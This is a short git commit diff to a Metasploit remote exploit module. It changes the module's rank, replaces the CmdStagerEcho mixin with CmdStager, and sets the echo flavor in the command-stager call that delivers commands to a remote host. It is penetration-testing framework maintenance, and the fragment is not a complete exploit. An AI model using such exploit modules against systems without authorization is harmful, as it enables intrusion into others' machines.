bug/bundler_fix
Michael Messner 2014-07-08 21:58:15 +02:00
parent 51001f9cb3
commit 579ce0a858
1 changed files with 3 additions and 2 deletions

View File

@ -6,9 +6,9 @@
require 'msf/core' require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = NormalRanking
include Msf::Exploit::CmdStagerEcho include Msf::Exploit::CmdStager
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -110,6 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{rhost}:#{rport} - Exploiting...") print_status("#{rhost}:#{rport} - Exploiting...")
execute_cmdstager( execute_cmdstager(
:flavor => :echo,
:linemax => 950 :linemax => 950
) )
end end